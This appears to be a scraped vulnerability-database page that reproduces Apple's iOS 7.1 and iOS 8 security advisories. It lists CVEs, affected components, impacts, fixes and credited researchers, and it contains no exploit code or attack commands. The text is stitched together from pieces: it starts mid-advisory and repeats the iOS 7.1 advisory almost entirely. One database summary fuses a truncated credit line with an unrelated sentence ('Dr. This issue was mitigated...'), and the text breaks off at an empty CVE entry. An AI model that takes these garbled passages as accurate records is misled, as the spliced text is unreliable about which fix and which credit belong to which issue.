Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out of bounds memory access issue existed in the ARM
ptmx_get_ioctl function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1278 : evad3rs
Office Viewer
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Opening a maliciously crafted Microsoft Word document may
lead to an unexpected application termination or arbitrary code
execution
Description: A double free issue existed in the handling of
Microsoft Word documents. This issue was addressed through improved
memory management.
CVE-ID
CVE-2014-1252 : Felix Groebert of the Google Security Team
Photos Backend
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Deleted images may still appear in the Photos app underneath
transparent images
Description: Deleting an image from the asset library did not delete
cached versions of the image. This issue was addressed through
improved cache management.
CVE-ID
CVE-2014-1281 : Walter Hoelblinger of Hoelblinger.com, Morgan Adams,
Tom Pennington
Profiles
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A configuration profile may be hidden from the user
Description: A configuration profile with a long name could be
loaded onto the device but was not displayed in the profile UI. The
issue was addressed through improved handling of profile names.
CVE-ID
CVE-2014-1282 : Assaf Hefetz, Yair Amit and Adi Sharabani of Skycure
Safari
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: User credentials may be disclosed to an unexpected site via
autofill
Description: Safari may have autofilled user names and passwords
into a subframe from a different domain than the main frame. This
issue was addressed through improved origin tracking.
CVE-ID
CVE-2013-5227 : Niklas Malmgren of Klarna AB
Settings - Accounts
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
disable Find My iPhone without entering an iCloud password
Description: A state management issue existed in the handling of the
Find My iPhone state. This issue was addressed through improved
handling of Find My iPhone state.
CVE-ID
CVE-2014-1284
Springboard
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
see the home screen of the device even if the device has not been
activated
Description: An unexpected application termination during activation
could cause the phone to show the home screen. The issue was
addressed through improved error handling during activation.
CVE-ID
CVE-2014-1285 : Roboboi99
SpringBoard Lock Screen
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A remote attacker may be able to cause the lock screen to
become unresponsive
Description: A state management issue existed in the lock screen.
This issue was addressed through improved state management.
CVE-ID
CVE-2014-1286 : Bogdan Alecu of M-sec.net
TelephonyUI Framework
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A webpage could trigger a FaceTime audio call without user
interaction
Description: Safari did not consult the user before launching
facetime-audio:// URLs. This issue was addressed with the addition of
a confirmation prompt.
CVE-ID
CVE-2013-6835 : Guillaume Ross
USB Host
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
cause arbitrary code execution in kernel mode
Description: A memory corruption issue existed in the handling of
USB messages. This issue was addressed through additional validation
of USB messages.
CVE-ID
CVE-2014-1287 : Andy Davis of NCC Group
Video Driver
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Playing a maliciously crafted video could lead to the device
becoming unresponsive
Description: A null dereference issue existed in the handling of
MPEG-4 encoded files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2014-1280 : rg0rd
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2909 : Atte Kettunen of OUSPG
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-5196 : Google Chrome Security Team
CVE-2013-5197 : Google Chrome Security Team
CVE-2013-5198 : Apple
CVE-2013-5199 : Apple
CVE-2013-5225 : Google Chrome Security Team
CVE-2013-5228 : Keen Team (@K33nTeam) working with HP's Zero Day
Initiative
CVE-2013-6625 : cloudfuzzer
CVE-2013-6635 : cloudfuzzer
CVE-2014-1269 : Apple
CVE-2014-1270 : Apple
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "7.1".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJTGlvJAAoJEPefwLHPlZEwh2cP/iOvfDbgv78TKX2hsxttcy8l
NTK4EbpYO0rEpqbQukIHwBrb+PtEWK4tdxWPNQV+8GnCPaLqmMXWxHZPkI02qXjI
UxYNgPq+9MPcoFFdbbptz4azcwFa0rdsQtxL0MYRrUqW5ml86zjGsVWUDGMDFu9R
fuujvU/JOGoIYVxFQziEScnMfryw61b/JObcT/mDzXv/IcKhuMzMfp4cbnXq7Mmx
NOpIQ0syx5oH7jadJA72iX7UyUuoydAcD3gaJDbLLfjEM8giDTL/TmH1HpuJjDHq
Zmj0NMlMqAztoFzpHZxlJ6kYjFYs7heyWgm3HQ+dwT0cDajFEZUEJGuBBO+P6dwp
cVlhDJ87crsP2ctUn46EUGFw5fFZRPEUqm4r0M/3o8z2ZPDqFxIBwMHEEV2LJtuN
lKjHYYWTO9BZOg87pm/HLpNqqTEz7J1eDWVJiRh5kZarp8w5KgZhBhYkltlPKwOo
Uh1SvUH+CjgNQTObSLv+e2EJ0So8gi3xBGHOrOdcof33fTsyL4WDvHEIvs4l1jUY
f29uha46K3dVZpJtFV3xTiwm6fodWgTR4xhWSAAVI2V8V4KLQMEHu7+eV+cURmme
JLdVgzxXw0uZHP874Uy60qR+6KBdEkIvgAoDHmd9jLnZMJTQAcn7PjcZz2z/V25u
3bQ2RrEc85Xqs7adpinL
=W1ik
-----END PGP SIGNATURE-----
| VAR-201403-0157 | CVE-2013-5133 | Apple iOS File overwrite vulnerability during restore operation |
CVSS V2: 8.8 CVSS V3: - Severity: HIGH |
Backup in Apple iOS before 7.1 does not properly restrict symlinks, which allows remote attackers to overwrite files during a restore operation via crafted backup data. Apple iOS is prone to multiple vulnerabilities.
Attackers can exploit these issues to perform man-in-the-middle attack, to access arbitrary files, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions.
These issues affect Apple iOS versions prior to 7.1.
Note: The issue described by CVE-2013-6835 has been moved to BID 66108 (Apple iOS 'facetime-audio://' Security Bypass Vulnerability) for better documentation. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-03-10-1 iOS 7.1
iOS 7.1 is now available and addresses the following:
Backup
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A maliciously crafted backup can alter the filesystem
Description: A symbolic link in a backup would be restored, allowing
subsequent operations during the restore to write to the rest of the
filesystem. This issue was addressed by checking for symbolic links
during the restore process.
CVE-ID
CVE-2013-5133 : evad3rs
Certificate Trust Policy
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Root certificates have been updated
Description: Several certificates were added to or removed from the
list of system roots.
Configuration Profiles
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Profile expiration dates were not honored
Description: Expiration dates of mobile configuration profiles were
not evaluated correctly. The issue was resolved through improved
handling of configuration profiles.
CVE-ID
CVE-2014-1267
CoreCapture
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application can cause an unexpected system
termination
Description: A reachable assertion issue existed in CoreCapture's
handling of IOKit API calls. The issue was addressed through
additional validation of input from IOKit.
CVE-ID
CVE-2014-1271 : Filippo Bigarella
Crash Reporting
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: CrashHouseKeeping followed symbolic links while
changing permissions on files. This issue was addressed by not
following symbolic links when changing permissions on files.
CVE-ID
CVE-2014-1272 : evad3rs
dyld
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Code signing requirements may be bypassed
Description: Text relocation instructions in dynamic libraries may
be loaded by dyld without code signature validation. This issue was
addressed by ignoring text relocation instructions.
CVE-ID
CVE-2014-1273 : evad3rs
FaceTime
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
access FaceTime contacts from the lock screen
Description: FaceTime contacts on a locked device could be exposed
by making a failed FaceTime call from the lock screen. This issue was
addressed through improved handling of FaceTime calls.
CVE-ID
CVE-2014-1274
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
images in PDF files. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-1275 : Felix Groebert of the Google Security Team
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of TIFF
images. This issue was addressed through additional validation of
TIFF images.
CVE-ID
CVE-2012-2088
ImageIO
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Viewing a maliciously crafted JPEG file may lead to the
disclosure of memory contents
Description: An uninitialized memory access issue existed in
libjpeg's handling of JPEG markers, resulting in the disclosure of
memory contents. This issue was addressed through additional
validation of JPEG files.
CVE-ID
CVE-2013-6629 : Michal Zalewski
IOKit HID Event
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may monitor on user actions in other
apps
Description: An interface in IOKit framework allowed malicious apps
to monitor on user actions in other apps. This issue was addressed
through improved access control policies in the framework.
CVE-ID
CVE-2014-1276 : Min Zheng, Hui Xue, and Dr. Tao (Lenx) Wei of FireEye
iTunes Store
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A man-in-the-middle attacker may entice a user into
downloading a malicious app via Enterprise App Download
Description: An attacker with a privileged network position could
spoof network communications to entice a user into downloading a
malicious app. This issue was mitigated by using SSL and prompting
the user during URL redirects.
CVE-ID
CVE-2014-1277 : Stefan Esser
Kernel
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out of bounds memory access issue existed in the ARM
ptmx_get_ioctl function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-1278 : evad3rs
Office Viewer
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Opening a maliciously crafted Microsoft Word document may
lead to an unexpected application termination or arbitrary code
execution
Description: A double free issue existed in the handling of
Microsoft Word documents. This issue was addressed through improved
memory management.
CVE-ID
CVE-2014-1252 : Felix Groebert of the Google Security Team
Photos Backend
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Deleted images may still appear in the Photos app underneath
transparent images
Description: Deleting an image from the asset library did not delete
cached versions of the image. This issue was addressed through
improved cache management.
CVE-ID
CVE-2014-1281 : Walter Hoelblinger of Hoelblinger.com, Morgan Adams,
Tom Pennington
Profiles
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A configuration profile may be hidden from the user
Description: A configuration profile with a long name could be
loaded onto the device but was not displayed in the profile UI. The
issue was addressed through improved handling of profile names.
CVE-ID
CVE-2014-1282 : Assaf Hefetz, Yair Amit and Adi Sharabani of Skycure
Safari
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: User credentials may be disclosed to an unexpected site via
autofill
Description: Safari may have autofilled user names and passwords
into a subframe from a different domain than the main frame. This
issue was addressed through improved origin tracking.
CVE-ID
CVE-2013-5227 : Niklas Malmgren of Klarna AB
Settings - Accounts
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
disable Find My iPhone without entering an iCloud password
Description: A state management issue existed in the handling of the
Find My iPhone state. This issue was addressed through improved
handling of Find My iPhone state.
CVE-ID
CVE-2014-1284
Springboard
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
see the home screen of the device even if the device has not been
activated
Description: An unexpected application termination during activation
could cause the phone to show the home screen. The issue was
addressed through improved error handling during activation.
CVE-ID
CVE-2014-1285 : Roboboi99
SpringBoard Lock Screen
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A remote attacker may be able to cause the lock screen to
become unresponsive
Description: A state management issue existed in the lock screen.
This issue was addressed through improved state management.
CVE-ID
CVE-2014-1286 : Bogdan Alecu of M-sec.net
TelephonyUI Framework
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A webpage could trigger a FaceTime audio call without user
interaction
Description: Safari did not consult the user before launching
facetime-audio:// URLs. This issue was addressed with the addition of
a confirmation prompt.
CVE-ID
CVE-2013-6835 : Guillaume Ross
USB Host
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
cause arbitrary code execution in kernel mode
Description: A memory corruption issue existed in the handling of
USB messages. This issue was addressed through additional validation
of USB messages.
CVE-ID
CVE-2014-1287 : Andy Davis of NCC Group
Video Driver
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Playing a maliciously crafted video could lead to the device
becoming unresponsive
Description: A null dereference issue existed in the handling of
MPEG-4 encoded files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2014-1280 : rg0rd
WebKit
Available for: iPhone 4 and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-2909 : Atte Kettunen of OUSPG
CVE-2013-2926 : cloudfuzzer
CVE-2013-2928 : Google Chrome Security Team
CVE-2013-5196 : Google Chrome Security Team
CVE-2013-5197 : Google Chrome Security Team
CVE-2013-5198 : Apple
CVE-2013-5199 : Apple
CVE-2013-5225 : Google Chrome Security Team
CVE-2013-5228 : Keen Team (@K33nTeam) working with HP's Zero Day
Initiative
CVE-2013-6625 : cloudfuzzer
CVE-2013-6635 : cloudfuzzer
CVE-2014-1269 : Apple
CVE-2014-1270 : Apple
CVE-2014-1289 : Apple
CVE-2014-1290 : ant4g0nist (SegFault) working with HP's Zero Day
Initiative, Google Chrome Security Team
CVE-2014-1291 : Google Chrome Security Team
CVE-2014-1292 : Google Chrome Security Team
CVE-2014-1293 : Google Chrome Security Team
CVE-2014-1294 : Google Chrome Security Team
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "7.1".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJTGlvJAAoJEPefwLHPlZEwh2cP/iOvfDbgv78TKX2hsxttcy8l
NTK4EbpYO0rEpqbQukIHwBrb+PtEWK4tdxWPNQV+8GnCPaLqmMXWxHZPkI02qXjI
UxYNgPq+9MPcoFFdbbptz4azcwFa0rdsQtxL0MYRrUqW5ml86zjGsVWUDGMDFu9R
fuujvU/JOGoIYVxFQziEScnMfryw61b/JObcT/mDzXv/IcKhuMzMfp4cbnXq7Mmx
NOpIQ0syx5oH7jadJA72iX7UyUuoydAcD3gaJDbLLfjEM8giDTL/TmH1HpuJjDHq
Zmj0NMlMqAztoFzpHZxlJ6kYjFYs7heyWgm3HQ+dwT0cDajFEZUEJGuBBO+P6dwp
cVlhDJ87crsP2ctUn46EUGFw5fFZRPEUqm4r0M/3o8z2ZPDqFxIBwMHEEV2LJtuN
lKjHYYWTO9BZOg87pm/HLpNqqTEz7J1eDWVJiRh5kZarp8w5KgZhBhYkltlPKwOo
Uh1SvUH+CjgNQTObSLv+e2EJ0So8gi3xBGHOrOdcof33fTsyL4WDvHEIvs4l1jUY
f29uha46K3dVZpJtFV3xTiwm6fodWgTR4xhWSAAVI2V8V4KLQMEHu7+eV+cURmme
JLdVgzxXw0uZHP874Uy60qR+6KBdEkIvgAoDHmd9jLnZMJTQAcn7PjcZz2z/V25u
3bQ2RrEc85Xqs7adpinL
=W1ik
-----END PGP SIGNATURE-----
| VAR-201403-0199 | CVE-2013-6835 | Apple iOS of TelephonyUI Vulnerability in obtaining phone number or email address information in the framework |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
TelephonyUI Framework in Apple iOS 7 before 7.1, when Safari is used, does not require user confirmation for FaceTime audio calls, which allows remote attackers to obtain telephone number or e-mail address information via a facetime-audio: URL. Apple iOS is affected by a security-bypass vulnerability.
Successfully exploiting this issue may allow an attacker to bypass certain security warnings. This may aid in further attacks.
These issues affect Apple iOS versions prior to 7.1.
Note: This issue was previously discussed in BID 66087 (Apple iOS APPLE-SA-2014-03-10-1 Multiple Security Vulnerabilities), but has been moved to its own record to better document it. The vulnerability is caused by Safari not asking the user before launching the facetime-audio:// URL.
CVE-ID
CVE-2014-1276 : Min Zheng, Hui Xue, and Dr. This issue was mitigated by using SSL and prompting
the user during URL redirects. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2014-09-17-1 iOS 8
iOS 8 is now available and addresses the following:
802.1X
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker can obtain WiFi credentials
Description: An attacker could have impersonated a WiFi access
point, offered to authenticate with LEAP, broken the MS-CHAPv1 hash,
and used the derived credentials to authenticate to the intended
access point even if that access point supported stronger
authentication methods. This issue was addressed by disabling LEAP by
default.
CVE-ID
CVE-2014-4364 : Pieter Robyns, Bram Bonne, Peter Quax, and Wim
Lamotte of Universiteit Hasselt
Accounts
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to identify the Apple ID
of the user
Description: An issue existed in the access control logic for
accounts. A sandboxed application could get information about the
currently-active iCloud account, including the name of the account.
This issue was addressed by restricting access to certain account
types from unauthorized applications.
CVE-ID
CVE-2014-4423 : Adam Weaver
Certificate Trust Policy
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Update to the certificate trust policy
Description: The certificate trust policy was updated. The complete
list of certificates may be viewed at
http://support.apple.com/kb/HT5012.
Accessibility
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: The device may not lock the screen when using AssistiveTouch
Description: A logic issue existed in AssistiveTouch's handling of
events, which resulted in the screen not locking. This issue was
addressed through improved handling of the lock timer.
CVE-ID
CVE-2014-4368 : Hendrik Bettermann
Accounts Framework
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker with access to an iOS device may access
sensitive user information from logs
Description: Sensitive user information was logged. This issue was
addressed by logging less information.
CVE-ID
CVE-2014-4357 : Heli Myllykoski of OP-Pohjola Group
Address Book
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to an iOS device may read the
address book
Description: The address book was encrypted with a key protected
only by the hardware UID. This issue was addressed by encrypting the
address book with a key protected by the hardware UID and the user's
passcode.
CVE-ID
CVE-2014-4352 : Jonathan Zdziarski
App Installation
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local attacker may be able to escalate privileges and
install unverified applications
Description: A race condition existed in App Installation. An
attacker with the capability of writing to /tmp may have been able to
install an unverified app. This issue was addressed by staging files
for installation in another directory.
CVE-ID
CVE-2014-4386 : evad3rs
App Installation
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local attacker may be able to escalate privileges and
install unverified applications
Description: A path traversal issue existed in App Installation. A
local attacker could have retargeted code signature validation to a
bundle different from the one being installed and cause installation
of an unverified app. This issue was addressed by detecting and
preventing path traversal when determining which code signature to
verify.
CVE-ID
CVE-2014-4384 : evad3rs
Assets
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker with a privileged network position may be able
to cause an iOS device to think that it is up to date even when it is
not
Description: A validation issue existed in the handling of update
check responses. Spoofed dates from Last-Modified response headers
set to future dates were used for If-Modified-Since checks in
subsequent update requests. This issue was addressed by validation of
the Last-Modified header.
CVE-ID
CVE-2014-4383 : Raul Siles of DinoSec
Bluetooth
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Bluetooth is unexpectedly enabled by default after upgrading
iOS
Description: Bluetooth was enabled automatically after upgrading
iOS. This was addressed by only turning on Bluetooth for major or
minor version updates.
CVE-ID
CVE-2014-4354 : Maneet Singh, Sean Bluestein
CoreGraphics
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow existed in the handling of PDF
files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4377 : Felipe Andres Manzano of Binamuse VRT working with
the iSIGHT Partners GVP Program
CoreGraphics
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or an information disclosure
Description: An out of bounds memory read existed in the handling of
PDF files. This issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4378 : Felipe Andres Manzano of Binamuse VRT working with
the iSIGHT Partners GVP Program
Data Detectors
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Tapping on a FaceTime link in Mail would trigger a FaceTime
audio call without prompting
Description: Mail did not consult the user before launching
facetime-audio:// URLs. This issue was addressed with the addition of
a confirmation prompt.
CVE-ID
CVE-2013-6835 : Guillaume Ross
Foundation
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An application using NSXMLParser may be misused to disclose
information
Description: An XML External Entity issue existed in NSXMLParser's
handling of XML. This issue was addressed by not loading external
entities across origins.
CVE-ID
CVE-2014-4374 : George Gal of VSR (http://www.vsecurity.com/)
Home & Lock Screen
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A background app can determine which app is frontmost
Description: The private API for determining the frontmost app did
not have sufficient access control. This issue was addressed through
additional access control.
CVE-ID
CVE-2014-4361 : Andreas Kurtz of NESO Security Labs and Markus
TroBbach of Heilbronn University
iMessage
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Attachments may persist after the parent iMessage or MMS is
deleted
Description: A race condition existed in how attachments were
deleted. This issue was addressed by conducting additional checks on
whether an attachment has been deleted.
CVE-ID
CVE-2014-4353 : Silviu Schiau
IOAcceleratorFamily
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An application may cause an unexpected system termination
Description: A null pointer dereference existed in the handling of
IOAcceleratorFamily API arguments. This issue was addressed through
improved validation of IOAcceleratorFamily API arguments.
CVE-ID
CVE-2014-4369 : Catherine aka winocm
IOAcceleratorFamily
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: The device may unexpectedly restart
Description: A NULL pointer dereference was present in the
IntelAccelerator driver. The issue was addressed by improved error
handling.
CVE-ID
CVE-2014-4373 : cunzhang from Adlab of Venustech
IOHIDFamily
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to read kernel pointers,
which can be used to bypass kernel address space layout randomization
Description: An out-of-bounds read issue existed in the handling of
an IOHIDFamily function. This issue was addressed through improved
bounds checking.
CVE-ID
CVE-2014-4379 : Ian Beer of Google Project Zero
IOHIDFamily
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A heap buffer overflow existed in IOHIDFamily's
handling of key-mapping properties. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2014-4404 : Ian Beer of Google Project Zero
IOHIDFamily
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A null pointer dereference existed in IOHIDFamily's
handling of key-mapping properties. This issue was addressed through
improved validation of IOHIDFamily key-mapping properties.
CVE-ID
CVE-2014-4405 : Ian Beer of Google Project Zero
IOHIDFamily
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with kernel privileges
Description: An out-of-bounds write issue existed in the IOHIDFamily
kernel extension. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2014-4380 : cunzhang from Adlab of Venustech
IOKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to read uninitialized
data from kernel memory
Description: An uninitialized memory access issue existed in the
handling of IOKit functions. This issue was addressed through
improved memory initialization
CVE-ID
CVE-2014-4407 : @PanguTeam
IOKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of certain
metadata fields of IODataQueue objects. This issue was addressed
through improved validation of metadata.
CVE-ID
CVE-2014-4418 : Ian Beer of Google Project Zero
IOKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A validation issue existed in the handling of certain
metadata fields of IODataQueue objects. This issue was addressed
through improved validation of metadata.
CVE-ID
CVE-2014-4388 : @PanguTeam
IOKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: An integer overflow existed in the handling of IOKit
functions. This issue was addressed through improved validation of
IOKit API arguments.
CVE-ID
CVE-2014-4389 : Ian Beer of Google Project Zero
Kernel
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to determine kernel memory layout
Description: Multiple uninitialized memory issues existed in the
network statistics interface, which led to the disclosure of kernel
memory content. This issue was addressed through additional memory
initialization.
CVE-ID
CVE-2014-4371 : Fermin J. Serna of the Google Security Team
CVE-2014-4419 : Fermin J. Serna of the Google Security Team
CVE-2014-4420 : Fermin J. Serna of the Google Security Team
CVE-2014-4421 : Fermin J. Serna of the Google Security Team
Kernel
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with a privileged network position may cause a
denial of service
Description: A race condition issue existed in the handling of IPv6
packets. This issue was addressed through improved lock state
checking.
CVE-ID
CVE-2011-2391 : Marc Heuse
Kernel
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: A double free issue existed in the handling of Mach
ports. This issue was addressed through improved validation of Mach
ports.
CVE-ID
CVE-2014-4375 : an anonymous researcher
Kernel
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to cause an unexpected system
termination or arbitrary code execution in the kernel
Description: An out-of-bounds read issue existed in rt_setgate. This
may lead to memory disclosure or memory corruption. This issue was
addressed through improved bounds checking.
CVE-ID
CVE-2014-4408
Kernel
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Some kernel hardening measures may be bypassed
Description: The random number generator used for kernel hardening
measures early in the boot process was not cryptographically secure.
Some of its output was inferable from user space, allowing bypass of
the hardening measures. This issue was addressed by using a
cryptographically secure algorithm.
CVE-ID
CVE-2014-4422 : Tarjei Mandt of Azimuth Security
Libnotify
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with root privileges
Description: An out-of-bounds write issue existed in Libnotify. This
issue was addressed through improved bounds checking.
CVE-ID
